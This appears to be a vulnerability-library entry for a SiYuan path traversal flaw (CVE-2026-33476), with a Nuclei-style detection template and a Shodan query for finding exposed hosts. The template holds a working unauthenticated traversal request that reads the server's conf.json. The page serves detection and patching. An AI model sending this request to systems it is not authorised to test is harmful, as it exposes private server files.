/Vulnerability Library

SiYuan <= v3.6.1 - Path Traversal

CVE-2026-33476
Verified

Description

SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.

Severity

High

CVSS Score

7.5

Exploit Probability

3%

Affected Product

siyuan

Published Date

June 3, 2026

Template Author

wrg-11

CVE-2026-33476.yaml
id: CVE-2026-33476

info:
  name: SiYuan <= v3.6.1 - Path Traversal
  author: WRG-11
  severity: high
  description: |
    SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.
  impact: |
    Unauthenticated attackers can read arbitrary files accessible to the server, potentially exposing sensitive information.
  remediation: |
    Update to version 3.6.2 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7
    - https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33476
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-33476
    epss-score: 0.03256
    epss-percentile: 0.86836
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,lfi,traversal,exposure

http:
  - raw:
      - |
        GET /appearance/langs/../../conf.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"kernelVersion"'
          - '"logLevel"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220416a42ebd07372992bffaa22bb63184bac216631b61ef79b7ba526180829fa4e02201347d25b47c58c100accceed7a82515128744f94f24eec23eeb729efa33701d5:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-33476
CWE ID:
cwe-22

References

https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2ahttps://nvd.nist.gov/vuln/detail/CVE-2026-33476

Remediation Steps

Update to version 3.6.2 or later.